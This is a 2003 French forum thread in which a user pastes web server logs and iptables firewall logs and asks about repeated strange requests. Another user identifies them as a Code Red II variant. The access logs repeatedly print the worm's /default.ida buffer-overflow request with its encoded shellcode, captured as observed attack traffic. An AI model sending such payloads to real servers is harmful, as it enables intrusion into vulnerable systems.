[C koi] Attaque etranges ...

Attaque etranges ... [C koi] - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 15-03-2003 à 13:28:36    

J'ai regardé mes logs, et j'ai ca :
 
 

81.56.145.71 - - [15/Mar/2003:12:21:44 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:12:31:42 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.249.181 - - [15/Mar/2003:12:36:21 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.57.173.43 - - [15/Mar/2003:12:36:44 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:12:53:58 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.110.172 - - [15/Mar/2003:12:55:25 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.135.194 - - [15/Mar/2003:12:57:56 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.124.11 - - [15/Mar/2003:12:58:25 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.10.242 - - [15/Mar/2003:13:06:43 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.191.62 - - [15/Mar/2003:13:08:52 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.57.173.43 - - [15/Mar/2003:13:15:06 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"
81.56.126.18 - - [15/Mar/2003:13:16:03 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 410 295 "-" "-"

 
C'est quoi ce truc de fou qui vient de plein d'ips differentes et tjs avec la meme attaque ??
qn a des infos la dessus ?
 
et en cadeau j'ai ca aussi :
 
 

REC=0x00 TTL=120 ID=56657 DF PROTO=TCP SPT=2066 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:54:36 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=10082 DF PROTO=TCP SPT=2291 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:55:04 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=31589 DF PROTO=TCP SPT=2334 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:56:03 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=10862 DF PROTO=TCP SPT=2439 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:58:45 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=53633 DF PROTO=TCP SPT=2658 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:58:45 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=53889 DF PROTO=TCP SPT=2659 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 10:59:06 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=32386 DF PROTO=TCP SPT=2662 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:01:11 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=2705 DF PROTO=TCP SPT=2832 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:01:14 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=58769 DF PROTO=TCP SPT=2832 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:03:29 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=30110 DF PROTO=TCP SPT=3009 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:03:30 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=34718 DF PROTO=TCP SPT=3010 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:05:42 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=29610 DF PROTO=TCP SPT=3183 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:05:42 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=29866 DF PROTO=TCP SPT=3184 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:07:46 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=42951 DF PROTO=TCP SPT=3363 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:07:46 routeur kernel: [IPTABLES syn flood] IN=ppp0 OUT= MAC= SRC=194.254.26.157 DST=81.56.219.82 LEN=44 TOS=0x00 PREC=0x00 TTL=120 ID=43207 DF PROTO=TCP SPT=3364 DPT=80 WINDOW=8192 RES=0x00 SYN URGP=0  
Mar 15 11:34:17 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.247.46 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=17868 DF PROTO=TCP SPT=4893 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 11:36:15 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=35187 DF PROTO=TCP SPT=2751 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:21:29 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.145.71 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=61259 DF PROTO=TCP SPT=3175 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:53:53 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.126.18 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=23003 DF PROTO=TCP SPT=4644 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 12:55:13 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.110.172 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=36831 DF PROTO=TCP SPT=4337 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:06:29 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=49647 DF PROTO=TCP SPT=1521 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:06:35 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.10.242 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=50246 DF PROTO=TCP SPT=1521 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  
Mar 15 13:15:12 routeur kernel: [IPTABLES ACK packet] IN=ppp0 OUT= MAC= SRC=81.57.197.116 DST=81.56.219.82 LEN=40 TOS=0x00 PREC=0x00 TTL=127 ID=4405 PROTO=TCP SPT=4662 DPT=35835 WINDOW=0 RES=0x00 ACK RST URGP=0  
Mar 15 13:18:22 routeur kernel: [IPTABLES Paquet invalide] IN=ppp0 OUT= MAC= SRC=80.132.249.5 DST=81.56.219.82 LEN=56 TOS=0x00 PREC=0x00 TTL=119 ID=13043 PROTO=ICMP TYPE=3 CODE=3 [SRC=81.56.219.82 DST=192.168.1.134 LEN=46 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=UDP SPT=31040 DPT=4665 LEN=26 ]  
Mar 15 13:18:55 routeur kernel: [IPTABLES SYN packet] IN=ppp0 OUT= MAC= SRC=81.56.247.46 DST=81.56.219.82 LEN=48 TOS=0x00 PREC=0x00 TTL=126 ID=16500 DF PROTO=TCP SPT=4574 DPT=80 WINDOW=65535 RES=0x00 SYN URGP=0  

 
 
attir-je les acharnés ??


Message édité par HuGoBioS le 15-03-2003 à 13:29:19

---------------
-= In Kik00 101 I trust :o =-
Reply

Marsh Posté le 15-03-2003 à 13:28:36   

Reply

Marsh Posté le 15-03-2003 à 13:29:41    

variante de codered II :
http://forum.hardware.fr/forum2.ph [...] h=&subcat=


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
Reply

Marsh Posté le 15-03-2003 à 13:34:28    

oky ... c'est chiant :/  
 
merci de l'info !


---------------
-= In Kik00 101 I trust :o =-
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed